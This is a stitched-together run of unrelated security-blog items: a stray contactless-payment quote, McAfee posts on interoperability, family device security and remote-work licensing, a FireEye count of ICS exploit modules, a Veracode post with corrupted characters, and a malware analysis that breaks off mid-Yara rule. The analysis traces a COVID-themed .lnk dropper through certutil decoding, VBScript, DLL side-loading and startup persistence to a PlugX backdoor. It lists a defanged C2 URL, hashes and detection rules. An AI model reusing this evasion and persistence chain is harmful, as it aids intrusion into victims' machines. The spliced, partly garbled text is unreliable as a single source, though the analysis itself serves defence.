BRC Head of Payments Policy, Andrew Cregan, said: “The last contactless limit increase to £30 took two years to implement but, given the extraordinary circumstances we face today, this new £45 limit will be rolled-out from next week. Some shops will take longer to make the necessary changes, given the strain they’re under. In the meantime, most customers can continue to make contactless payments for higher amounts using their smart phone.”

Interoperability Is Key To Cybersecurity – A Conversation at CSIS

Interoperability – a subject that for too long cybersecurity companies have treated as an inconvenient nuisance – is finally getting the attention it deserves. In February, I had the opportunity to discuss the critical nature of interoperability with true security experts in the public and private sectors. We agreed that to solve the world’s biggest security problems, collaboration in the cybersecurity industry should become the new norm.

McAfee has long promoted interoperability in our products and through our corporate tagline “Together Is Power.” It was encouraging to hear the perspective of NIST’s Donna Dodson, Cyber Threat Alliance’s CEO Michael Daniel and CSIS’s Jim Lewis, all of whom agreed that designing tools that interoperate with each other is integral to successful cybersecurity and will improve security outcomes for organizations and governments.

Here are some highlights of our discussion:

  • For too long, vendors touted their proprietary “secret sauce” to compete on who had the best (yet incomplete) data set. They’d be better off taking advantage of initiatives like the Cyber Threat Alliance’s information-sharing program, allowing them to shift their focus from improving data sets, to the power of their analytics and the tools they develop for understanding the data. Competing at this level and not on the level of proprietary data sets will help the industry with better insights that ever before, providing a more complete picture of the threat landscape.

 

  • The federal government has added new cyber tools to its arsenal in recent years, but many of them can’t talk to each other. As NIST’s Donna Dodson noted, enabling these tools to work together has significant security and operational benefits. In short, interoperability has real-world business advantages, not just technical ones. Giving businesses and organizations, including the federal government, a full suite of interoperable solutions and tools will have benefits that extend beyond just security.

 

  • Major efforts are underway to make widespread interoperability a reality. From the standards work of various standards development organizations such as OASIS, IETF and others, as well as industry groups such as the Open Cybersecurity Alliance, dedicated to advancing integrated interoperability, organizations are collaborating to help develop standards, open source common communications and data federation capabilities, tools and policies.

Interoperability is critical and vital on multiple levels, as cyber threats continue to challenge organizations across the globe.  We must be able to share standardized threat data. We must be able to integrate our cyber defense tools in a much simpler fashion than is possible today. Organizations need to be able to purchase best-of-breed defensive solutions and integrate them quickly and easily.  We cannot continue to put the cumbersome burden of product and data integration on each organization that buys cybersecurity products.

Cybersecurity vendors should not be competing on plumbing. We must find ways to up-level competition between vendors while focusing on defending against the adversary we all face daily. We need to focus on improving security in order to, for example, help hospitals better understand the threat landscape to prevent life-threatening attacks and help the Department of Defense better identify national security threats. Interoperability makes these things possible, and we must continue to have important conversations like these to make interoperability a reality.

To watch our full discussion, click here.

 

 

The post Interoperability Is Key To Cybersecurity – A Conversation at CSIS appeared first on McAfee Blogs.

Monitoring ICS Cyber Operation Tools and Software Exploit Modules To Anticipate Future Threats

There has only been a small number of broadly documented cyber attacks targeting operational technologies (OT) / industrial control systems (ICS) over the last decade. While fewer attacks is clearly a good thing, the lack of an adequate sample size to determine risk thresholds can make it difficult for defenders to understand the threat environment, prioritize security efforts, and justify resource allocation.

To address this problem, FireEye Mandiant Threat Intelligence produces a range of reports for subscription customers that focus on different indicators to predict future threats. Insights from activity on dark web forums, anecdotes from the field, ICS vulnerability research, and proof of concept research makes it possible to illustrate the threat landscape even with limited incident data. This blog post focuses on one of those source sets—ICS-oriented intrusion and attack tools, which will be referred to together in this post as cyber operation tools.

ICS-oriented cyber operation tools refer to hardware and software that has the capability to either exploit weaknesses in ICS, or interact with the equipment in such a way that could be utilized by threat actors to support intrusions or attacks. For this blog post, we separated exploit modules that are developed to run on top of frameworks such as Metasploit, Core Impact, or Immunity Canvas from other cyber operation tools due to their exceedingly high number.

Cyber Operation Tools Reduce the Level of Specialized Knowledge Attackers Need to Target ICS

As ICS are a distinct sub-domain to information and computer technology, successful intrusions and attacks against these systems often requires specialized knowledge, establishing a higher threshold for successful attacks. Since intrusion and attack tools are often developed by someone who already has the expertise, these tools can help threat actors bypass the need for gaining some of this expertise themselves, or it can help them gain the requisite knowledge more quickly. Alternatively, experienced actors may resort to using known tools and exploits to conceal their identity or maximize their budget.


Figure 1: ICS attacker knowledge curve

The development and subsequent adoption of standardized cyber operation tools is a general indication of increasing adversarial capability. Whether these tools were developed by researchers as proof-of-concept or utilized during past incidents, access to them lowers the barrier for a variety of actors to learn and develop future skills or custom attack frameworks. Following this premise, equipment that is vulnerable to exploits using known cyber operation tools becomes low-hanging fruit for all sorts of attackers.

ICS Cyber Operation Tool Classification

Mandiant Intelligence tracks a large number of publicly available ICS-specific cyber operation tools. The term "ICS-specific," as we employ it, does not have a hard-edged definition. While the vast majority of cyber operation tools we track are clear-cut cases, we have, in some instances, considered the intent of the tool's creator(s) and the tool's reasonably foreseeable impact on ICS software and equipment. Note, we excluded tools that are IT-based but may affect OT systems, such as commodity malware or known network utilities.  We included only a few exceptions, where we identified specialized adaptations or features that enabled the tool to interact with ICS, such as the case of nmap scripts.

We assigned each tool to at least one of eight different categories or classes, based on functionality.


Table 1: Classes of ICS-specific intrusion and attack tools

While some of the tools included in our list were created as early as 2004, most of the development has taken place during the last 10 years. The majority of the tools are also vendor agnostic, or developed to target products from some of the largest ICS original equipment manufacturers (OEM). Siemens stands out in this area, with 60 percent of the vendor-specific tools potentially targeting its products. Other tools we identified were developed to target products from Schneider Electric, GE, ABB, Digi International, Rockwell Automation, and Wind River Systems.

Figure 2 depicts the number of tools by class. Of note, network discovery tools make up more than a quarter of the tools. We also highlight that in some cases, the software exploitation tools we track host extended repositories of modules to target specific products or vulnerabilities.


Figure 2: ICS-specific intrusion and attack tools by class

Software Exploit Modules

Software exploit modules are the most numerous subcomponents of cyber operation tools given their overall simplicity and accessibility. Most frequently, exploit modules are developed to take advantage of a specific vulnerability and automate the exploitation process. The module is then added to an exploit framework. The framework works as a repository that may contain hundreds of modules for targeting a wide variety of vulnerabilities, networks, and devices. The most popular frameworks include Metasploit, Core Impact, and Immunity Canvas. Also, since 2017, we have identified the development of younger ICS-specific exploit frameworks such as AutosploitIndustrial Exploitation Framework (ICSSPLOIT), and the Industrial Security Exploitation Framework.

Given the simplicity and accessibility of exploit modules, they are attractive to actors with a variety of skill levels. Even less sophisticated actors may take advantage of an exploit module without completely understanding how a vulnerability works or knowing each of the commands required to exploit it. We note that, although most of the exploit modules we track were likely developed for research and penetration testing, they could also be utilized throughout the attack lifecycle.

Exploit Modules Statistics

Since 2010, Mandiant Intelligence has tracked exploit modules for the three major exploitation frameworks: Metasploit, Core Impact, and Immunity Canvas. We currently track hundreds of ICS-specific exploit modules related to more than 500 total vulnerabilities, 71 percent of them being potential zero-days. The break down is depicted in Figure 3. Immunity Canvas currently has the most exploits due in large part to the efforts of Russian security research firm GLEG.


Figure 3: ICS exploit modules by framework

Metasploit framework exploit modules deserve particular attention. Even though it has the fewest number of modules, Metasploit is freely available and broadly used for IT penetration testing, while Core Impact and Immunity Canvas are both commercial tools. This makes Metasploit the most accessible of the three frameworks. However, it means that module development and maintenance are provided by the community, which is likely contributing to the lower number of modules.

It is also worthwhile to examine the number of exploit modules by ICS product vendor. The results of this analysis are depicted in Figure 4, which displays vendors with the highest number of exploit modules (over 10).


Figure 4: Vendors with 10 exploit modules or more

Figure 4 does not necessarily indicate which vendors are the most targeted, but which products have received the most attention from exploit writers. Several factors could contribute to this, including the availability of software to experiment with, general ease of writing an exploit on particular vulnerabilities, or how the vulnerability matches against the expertise of the exploit writers.

Some of the vendors included in the graph have been acquired by other companies, however we tracked them separately as the vulnerability was identified prior to the acquisition. One example of this is Schneider Electric, which acquired 7-Technologies in 2011 and altered the names of their product portfolio. We also highlight that the graph solely counts exploit modules, regardless of the vulnerability exploited. Modules from separate frameworks could target the same vulnerability and would each be counted separately.

ICS Cyber Operation Tools and Software Exploitation Frameworks Bridge Knowledge and Expertise Gaps

ICS-specific cyber operation tools often released by researchers and security practitioners are useful assets to help organizations learn about ongoing threats and product vulnerabilities. However, as anything publicly available, they can also lower the bar for threat actors that hold an interest in targeting OT networks. Although successful attacks against OT environments will normally require a high level of skills and expertise from threat actors, the tools and exploit modules discussed in this post are making it easier to bridge the knowledge gap.

Awareness about the proliferation of ICS cyber operation tools should serve as an important risk indicator of the evolving threat landscape. These tools provide defenders with an opportunity to perform risk assessments in test environments and to leverage aggregated data to communicate and obtain support from company executives. Organizations that do not pay attention to available ICS cyber operation tools risk becoming low-hanging fruit for both sophisticated and unexperienced threat actors exploring new capabilities.

FireEye Intelligence customers have access to the full list and analysis of ICS cyber operation tools and exploit modules. Visit our website to learn more about the FireEye Mandiant Cyber Physical Threat Intelligence subscription.

Honey, We’re Home! Securing Your Devices and Your Family Bond  

family device security

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think its a hassle, consider the simplicity of a password manager. Using a password manager will make changing passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them with the same value.

It’s a new frontier parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

How McAfee Can Help You Scale Security to Employees Working from Home

We’re in a moment of rapid change for our IT environments. As companies shift from working in an office within their controlled network to working from home, many are finding that the architectures they have in place aren’t ready for the scalability and security challenges of a decentralized workforce. There are three prominent scenarios created by this shift that have an impact on security posture: 

  1. Unprotected devices are being used for work. Some of you may be asking your employees to use their personal laptops for work at home. Others are issuing new managed laptops that need to ramp up with existing endpoint security.  
  2. The internet is accessed directly, without a VPN. Most VPN deployments aren’t ready to scale to an entire workforce routing traffic through them. Slowdowns and outages can cause users to turn off their VPN. Some may not be licensed for the entire workforce. In each scenario, devices will access the internet directly without the defense in depth of your managed network. 
  3. Data going to cloud services no longer routes through the network. There has been a massive increase in the use of cloud-based tools to support meetings and collaboration for decentralized teams. With direct internet accesses, data sent to the cloud falls out of your visibility and becomes vulnerable. Sharing within the cloud and to external parties also falls outside of your visibility and control. 

For many, existing security investments can be slightly augmented or scaled to cover these use cases. Others may need to quickly add capabilities. Let’s discuss how: 

Unprotected personal devices 

If you are asking employees to work from their personally owned laptops and mobile devicesplease contact your McAfee Account Manager or email homeuse@mcafee.com for licenses to our home use security for endpoint devices, available for free until May 31st, 2020*. This will provide comprehensive device protection including anti-malwareEmployees can download this software on unlimited devices in their household to help prevent lateral movement of attacks within their home network.  

Unprotected managed devices 

If you are issuing new managed devices to employees so they can work from home, we have a few options to help you easily deploy McAfee Endpoint Protection to them. First, if you have an existing per-user subscription, you are entitled to deploy McAfee Endpoint Protection to 5 devices per user at any time. If you need to add users, we are offering 3-month subscriptions to help you scale out. For your fastest route to deployment, you have access to our cloud-based management platform. Use this Contact Us form to get started.  

Direct internet access 

To protect your home-based users accessing the internet directly without a VPN, you can connect them to our cloud-based Secure Web Gateway, which is part of MVISION Unified Cloud Edge. This adds security without backhauling traffic over a VPN and can either replace or augment your on-premises secure web gateways. Existing McAfee Web Gateway customers can reuse their policy in a simple push to the cloud.  

For anyone new, Unified Cloud Edge adds immediate policy control, zero-day malware prevention, and data loss prevention (DLP) for web traffic. You also gain advanced cloud application intelligence, with sophisticated usage and risk reporting for Shadow IT based on your user’s browsing habits.   

We’re offering 3-month subscriptions to MVISION Unified Cloud Edge to cover your new home-based users, along with 3-month expansion subscriptions for existing customers of any McAfee Web Gateway product. Use this “Contact Us” form to get started.  

Data in Cloud Services 

To protect your data going into, shared within, and attempting to leave cloud services like Microsoft OneDrive, SharePoint, Exchange Teams, Box, Google Apps, Salesforce and others, your most effective control point is a direct API-based connection to the service itself, through a Cloud Access Security Broker (CASB). We are offering 3-month subscriptions to our CASB for any cloud service you need to protect. Again, use this “Contact Us” form to get started. 

The duration of this shift is uncertain. We have professional services available to help you scale out as fast as possible now, and you have the flexibility to deactivate any 3-month subscription when it is no longer needed.  

We understand the difficulty and urgency you are facing. Please take advantage of these offers to transition smoothly to a secure, workfromhome IT environment.  

Scale Security to Employees Working From Home

McAfee is offering 3-month subscription licenses for Endpoint Protection, Unified Cloud Edge, and CASB to help you address the security challenges created by a surge of employees working from home

Click Here to Get Started

For more, our Advanced Threat Research team is following attack trends targeting remote workers and has excellent information in their blog post here.    

* Use of consumer products is subject to the Consumer License Agreement and Privacy Notice. Product features may be added, changed or removed during the subscription term. Not all features may be available on all devices.  See System Requirements for additional information. 

The post How McAfee Can Help You Scale Security to Employees Working from Home appeared first on McAfee Blogs.

Fake Coronavirus tracking app exploiting our fear and vulnerable social situation

As the Coronavirus spreads across countries creating fear across the globe, everybody wants to stay on top of any information related to it wanting to remain safe and away from infected people. Malware authors are also taking advantage of this situation. Previously on the Android Playstore, there were many  applications present which claimed…

To Scan or Not to Scan? Why Frequency Matters for DevSecOps

Frequency matters. We know from our 10th annual State of Software Security report (SOSS) that when development teams scan their code for security more than 300 times per year, they can reduce their security debt by five times. That???s five times less risk carried around by developers, freeing them up to focus on improving processes and tackling the most dangerous vulnerabilities.

Recently, Veracode???s Chris Wysopal and Paul Farrington sat down with IDG for a podcast deep dive into these and other findings from our 10th edition of SOSS. In Frequency Matters: The Case for Scanning Early and Often, Chris and Paul discuss what scanning frequency means for creating a security-minded culture, and best practices for bringing regular scanning into DevSecOps processes.

So, what???s at the heart of this growing problem with security debt? On top of irregular scanning cadences, more organizations need to prioritize establishing clear processes and ask business decision-makers to take application security seriously. That, in part, means giving developers credit for their work and showing that they???ll be rewarded for making positive shifts in application security.

Encouraging business leaders to pour more time and resources into development teams only supports the objectives and goals that lead to more secure software. In part one of Frequency Matters, Veracode???s EMEA CTO Paul Farrington explains that when the technical aspects and processes of DevSecOps are embraced by internal teams, their fix rate is 11.5 times faster than teams that don???t embrace DevSecOps.

What does that mean in the long run? Faster fixes and fewer flaws lead to less security debt, which is a big problem plaguing organizations across all industries. In the second part of Frequency Matters, Veracode CTO Chris Wysopal sheds more light on the mounting security debt caused by persistent flaws that build up over long periods.

???We saw that medium severity flaws actually got fixed faster than high severity flaws, which seemed a little strange,??? Chris explains, speaking of the findings in SOSS X. ???But we did see the correlation between scan cadence and scan pattern; that correlation was much stronger.???

In order to build secure software, organizations can???t rely on prioritization alone. Instead, Chris says, businesses should have practices in place that are built into the software process to get ahead of vulnerabilities and stifle security debt.

Moreover, it???s essential that security and development teams break down their silos to build relationships across departments. With frequent scanning early and often, open discussions with management across departments, and a shifted focus on prioritization, reversing security debt is possible.ツ?

Want to learn more? Listen to both parts of Frequency Matters and the other episodes in this series to learn about the state of application security.

ツ?

Profile of a Developer Turned Hacker

The struggle to find experienced Cybersecurity professionals is familiar to anyone who has tried to fill a team. With connected technology expanding at a rate far greater than can reasonably be secured, experienced professionals seemingly have swaths of opportunities from which to choose.  Fortunately, many Cybersecurity organizations understand that identifying and training less experienced talent is a viable path to addressing a variety of hiring challenges they experience.

Is APT27 Abusing COVID-19 To Attack People ?!

Scenario

We are living hard time, many countries all around the world are hit by COVID-19 which happened to be a very dangerous disease. Unfortunately many deaths, thousands of infected people, few breathing equipment, stock burned Billion of dollars and a lot of companies are entering into a economic and financial crisis. Governments are doing their best to mitigate such a virus while people are stuck home working remotely using their own equipment.

In that scenario, jackals are luring people using every dirty way to attack their private devices. At home it’s hard to have advanced protection systems as we have in companies. For example it’s hard to have Intrusion Prevention Systems, proxies, advanced threat protection, automated sandbox and again advanced end-point protections letting personal devices more vulnerable to be attacked. In this reality ruthless attackers abuse of this situation to attack digitally unprotected people.

Today many reports are describing how infamous attackers are abusing such an emergency time to lure people by sending thematic email campaign or by using thematic IM within Malware or Phishing links. Following few of them that I believe would be a nice reading:

Today I want to contribute to such a blog-roll analyzing a new spreading variant that hit my observatory. I want to “spoil” the conclusions now, but it’s getting pretty sad if an APT group makes use of its knowledge to take advance from today’s situation.

Stage 1

The first stage is a fake PDF file. It looks like a real PDF, it has a hidden extension and a nice PDF icon, but it really isn’t a PDF, it’s actually a .lnk file, or in other words a “Microsoft Linking File”.

Sha25695489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8
ThreatDropper and Execution
Ssdeep24576:2D9JuasgfxPmNirQ2dRqZJuH3eBf9mddWoX+KIKoIkVrI:2DzuOxPm0iZLKIKRkq
DescriptionFake PDF file used to run initial infection chain

Opening up the .lnk file we might appreciate a weird linking pattern. Two main sections: one is a kind of header where it is possible to observe commands, and the other section is a big encoded payload.

.lnk file

Once beautified the first section it looks easier to understand what it does. It basically copies itself into a temporary folder (through cmd.exe), it extracts bytes from its body (from section two), it decodes such a bytes from Byte64 (through msoia.exe ) and it places the extracted content into the temporary user folder. It deflates the content (through expand) and it finally it executes a javascript file (through wscript) which was included into the compressed content. The following image shows the beautified code section of the analyzed file.

Beautified .lnk file

It is quite nice to see how the attacker copied certutils from local system, by using (*ertu*.exe) in order to avoid command line detection from public sandboxes. Indeed many sandboxes have signatures on certutils, since it’s quite a notorious tool used by some attackers, so that avoiding the behavior signature match it would take a lower score from public sandboxes.

Stage 2

Stage 1 carved Stage 2 from its body by extracting bytes and decoding them using base64 encoding. The new stage is a Microsoft compressed CAB file described in the following table.

Sha256f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9
ThreatMalware Carrier/Packer/Compressor
Ssdeep24576:CkL6X/3PSCuflrdNZ4J00ZcmNh3wsAR36Mge:vLK/fS200ZcYh3kqpe
DescriptionMicrosoft CAB bringing contents

Extracting files from Microsoft CAB we observe 6 more files entering in the battlefield:

  • 20200308-sitrep-48-covid-19.pdf. The original PDF from WHO explaining the COVID-19 status and how to fight it.
  • 3UDBUTNY7YstRc.tmp. PE32 Executable file (DLL)
  • 486AULMsOPmf6W.tmp. PE32 Executable (GUI)
  • 9sOXN6Ltf0afe7.js. Javascript file (called by .lnk)
  • cSi1r0uywDNvDu.tmp. XSL StyleSheet Document
  • MiZl5xsDRylf0W.tmp. Text file including PE32 file

Stage 1 executes the Javascript included in the CAB file. 9sOXN6Ltf0afe7.js performs an ActiveXObject call to WScript.Shell in order to execute Windows command lists. Once” deobfuscated” and beautified the command line looks like the following (9sOXN6Ltf0afe7.js payload beautified) . The attacker creates a folder that looks like a “file” by calling it cscript.exe trying to cheat the analyst. Then the attacker populates that folder with the needed files to follow the infection chain.

9sOXN6Ltf0afe7.js payload “deobfuscated”

A special thought goes to WINRM.VBS which helped the attacker to execute Signed Script Proxy Execution (T1216). According to Microsoft: “WINRM is the CLI interface to our WS-MGMT protocol. The neat thing about this is that you can call it from PowerShell to manage remote systems that don’t have PowerShell installed on them (including Server Core systems and Raw hardware).” The attacker also places a file called Wordcnvpxy.exe on the OFFICE12 folder. We will analyze it in a few steps but at that stage we might observe that is the “last call” before luring the victim by showing the good PDF file (also included in the CAB). But according with 9sOXN6Ltf0afe7.js the first run is on WsmPty.xsl which is the renamed version of cSi1r0uywDNvDu.tmp.

Stage 3

Stage 3 is run by stage 2 and it is a XSL (StleSheet Office file) wrapping a VBScript object.

Sha2569d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc
ThreatPayload Extractor and Command Executor
Ssdeep96:46Pdv3fOYCeeapSCDIKufYS2VGsBu746WJCSmCZyAcGghF:fh3fOYneaLDIgnNEFCZyAcGsF,
DescriptionDecode Additional Stage by using coding charsets and XOR

The following VBScript is run through cscript.exe, It’s an obfuscated and xor-encrypted payload. The encryption is performed by a simple xor having as key the single byte 0 while the encoding procedure is a multi conversion routine which could be summarized as follows:

chr(asc(chr(“&h”&mid(x,y,2))))

VBScript Stage3

The attacker tried to confuse the analyst by reusing variable names in private or local contexts, but after a couple of minutes, you might eventually come out with the following decryption loop.

Decryption Loop

If you run it against the embedded payload you will eventually see a new stage: Stage 4. A brand new script targeting old version of MSOffice.

Stage 4

Stage 4 is decoded and run by Stage 3. That stage runs an attacker version of MSOSTYLE.exe copied from Stage 2. It hijacks method on an old office 2007 component (Office Data Provider for – MSOSTYLE.exe).

Sha3567f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0
ThreatPersistence and Execution
Ssdeep48:zKxYaDzzXRrVHyMqHeIyJwlLGvTlGrbaTFGNT93TPTxGVhTG6TWWWsKj390C9nEm:zKxjDRt+e1sGvJG3aRGNNDtGLLqP5j3N
DescriptionSet persistence on the target system (Script File)

The following image shows the decrypted and decoded Stage. It’s quite clear the attacker wants to get persistence on the target machine and to run additional payload by abusing MSOSTYLE.exe (old component) placed in the “right folder” from stage 2. The persistence is guaranteed by adding a link called Accessories.lnk inside the startup windows folder pointing to: MiZl5xsDRylf0W.tmp.

Powershell Stage 4

Stage 5

Stage 5 is activated by Stage 2 but only after the execution of Stage 3 and Stage 4. Stage 5 is a multi-step session composed by the following additional artifacts: (i) 3UDBUTNY7YstRc.tmp renamed by Stage 2 into OINFO12.OCX and (ii) MiZl5xsDRylf0W.tmp renamed by Stage 2 into Wordcnvpxy.exe . Every single artifact is available after the execution of Stage 2 into the crafted folder called: OFFICE12 from the user home.

Sha256604679789c46a01aa320eb1390da98b92721b7144e57ef63853c3c8f6d7ea85d
ThreatRemote Control, depending on usage
Ssdeep536:/4yuzgQ5WugrQ+SccIp1t4xO67y5qHae:gyuzgKwr9bB1t4xO67y5j,
DescriptionOffice Data Provider for WBEM, not malicious but accountable.

MSOSTYLE.EXE is an old Microsoft Office Data Provider for WBEM. Web-Based Enterprise Management (WBEM) comprises a set of systems-management technologies developed to unify the management of distributed computing environments. So it could not be considered malicious, but it could be considered accountable of the entire infection chain.

Sha256a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e
ThreatPlugX, Command Execution
Ssdeed768:jxmCQWD+TAxTRh40XfEDDnFt4AczonsT:MC5bw+zosT
DescriptionA runner plus Command Execution, Pluging Manager

At the time of writing only three AVs detect OINFO12.OCX as a malicious file. Rising AV is actually the only company which attributes it to a well-known PlugX sample. According with Trend Micro, the PlugX malware family is well known to researchers having samples dating back to as early as 2008. PlugX is a fully featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote cmd.exe shell.

OINFO12.OCX VT coverage

Taking it on static analysis it will expose three callable functions: DeleteOfficeData (0x10001020), GetOfficeData (0x10001000) and EntryPoint 0x100015ac).

Both of the methods DeleteOfficeData and GetOfficeData looks like recalling a classic method to hijacking old Office Parser (take a look to here and figure 3 in here ) to execute commands.

DeleteOfficeData (0x10001020)
GetOfficeData (0x10001000)

Indeed if run from its Entry Point, the DLL executes Wordcnvpxy.exe (as it is the default plugin component). The executable DLL must be in the same path of Wordcnvpxy.exe and it needs to have such a filename (imposed by Stage 2 and hardcoded into the library). On the other side of the coin if commands are passed through stdin, it executes the given parameters as commands.

No Input Commands, Wordcnvpxy execution

The following image shows when parameters are given and Commands are executed.

Commands Execution

Finally we have Wordcnvpxy.exe which is run in the same stage (Stage 5) by OINFO12.OCX . At the time of writing, it is well-known from static engines, it looks like a standard backdoor beacon-ing to own command and control installed as PlugX module.

Sha256002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124
ThreatPlugX, Backdoor
Ssdeep1536:9/dlJMLIU94EYayTdHP6rUkn16O41yWCzB:93JsZxePUAFgWCz
DescriptionProbably one of the last stages, beaconing VS C2 and executing external commands
Wordcnvpxy VT coverage

The sample uses dynamic function loading avoiding static enumeration and guessing. It grabs information on the victim, PC-name, username, IP-location and send them to C2 as a first beacon.

Dynamic Loading function calls

The used Command and Control resolves to the following URL hxxp://motivation[.]neighboring[.]site/01/index.php

Command and Control

Unfortunately the attacker has shut down everything few hours after I started my analysis, so that I do not have more information about network, commands and additional Plugins. However the overall structure reminds me PlugX RAT as nicely described here.

Attribution

According to MITRE (BTW thank you @Arkbird_SOLG for the great suggestions on attribution) PlugX is a well known RAT attributed to China’s APT. APT27 (aka Emissary Panda) are the mostly notable APT group that used it. Moreover (thanks to @Arkbird_SOLG) “[…] on China culture, hijacking method are a mandatory knowledge for a job like pentesting […]” which could enforce the theory of APT27

UPDATE: I am aware that PlugX is today an opensource RAT, and I am aware that this is not enough for attribution. Indeed the intent of the title is to put doubts on that attribution by the usage of “?” (question mark). On one hand PlugX historically has been attributed to APT27 but on the other hand it’s public. So it’s hard to say Yes or Not, for such a reason the intent of this blog post is: Is APT27 Abusing COVID-19 To Attack People ?!. It’s an Open question not a position.

We all are passing a bad time. COVID-19 caused many death and is threatening entire economies. Please, even if you are an attacker and you gain profit from you infamous job, stop cyber attacks against peoples that are suffering this pandemic and rest. Ethics and compassion should be alive – even behind you monitors.

IoC

  • 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8 (original .lnk)
  • f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9 (Stage 2)
  • 9d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc (Stage 3)
  • 7f230a023a399b39fa1994c3eaa0027d6105769fffaf72918adebf584edc6fe0 (Stage 4)
  • a49133ed68bebb66412d3eb5d2b84ee71c393627906f574a29247d8699f1f38e (Stage 5/a)
  • 002c9e0578a8b76f626e59b755a8aac18b5d048f1cc76e2c12f68bc3dd18b124 (Stage 5/b)
  • hxxp://motivation[.]neighboring[.]site/01/index.php (C2)

Yara (auto)

import "pe"

rule MiZl5xsDRylf0W {
   meta:
      description = "yara - file MiZl5xsDRylf0W.tmp"
      date = "2020-03-17"
      hash1 = "b578a237587054f351f71bd41bede49197f77a1409176f839ebde105f3aee44c"
   strings:
      $s1 = "%ls\\%S.exe" fullword wide
      $s2 = "%XFTpX7m5ZvRCkEg" fullword ascii
      $s3 = "SK_Parasite, Version 1.0" fullword wide
      $s4 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPAD" ascii
      $s5 = "DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD" fullword ascii
      $s6 = "SKPARASITE" fullword wide
      $s7 = "default" fullword ascii /* Goodware String - occured 709 times */
      $s8 = "59xf4qy-YXn-pkuXh=x3CXPHCcs3dXFlCtr3Cc4H4XufdZjmAZe3Ccxuibvm592g" fullword ascii
      $s9 = "SK_Parasite" fullword wide
      $s10 = "KOeS5OEThZjnYazMJ7p3Ccx-ptAMKuUMLlPEID2=Kn4XLqTM4WhSAKAHAbRMxXsa5Xj-AazEAqzEAqgg" fullword ascii
      $s11 = "ZXsDCcsTA80HdkET" fullword ascii
      $s12 = "8c9h9q9" fullword ascii /* Goodware String - occured 1 times */
      $s13 = "<&<,<6<<<F<O<Z<_<h<r<}<" fullword ascii /* Goodware String - occured 1 times */
      $s14 = "5$5@5\\5`5" fullword ascii /* Goodware String - occured 1 times */
      $s15 = "About SK_Parasite" fullword wide
      $s16 = "1/2A2o2" fullword ascii /* Goodware String - occured 1 times */
      $s17 = "z2bqw7k90rJYALIQUxZK%sO=hd5C4piVMFlaRucWy31GTNH-mED8fnXtPvSojeB6g" fullword ascii
      $s18 = "PQQQQQQWQf" fullword ascii
      $s19 = "Copyright (C) 2020" fullword wide
      $s20 = "1)1p1z1" fullword ascii /* Goodware String - occured 1 times */
   condition:
      uint16(0) == 0x0300 and filesize < 200KB and
      8 of them
}

rule sig_9sOXN6Ltf0afe7 {
   meta:
      description = "yara - file 9sOXN6Ltf0afe7.js"
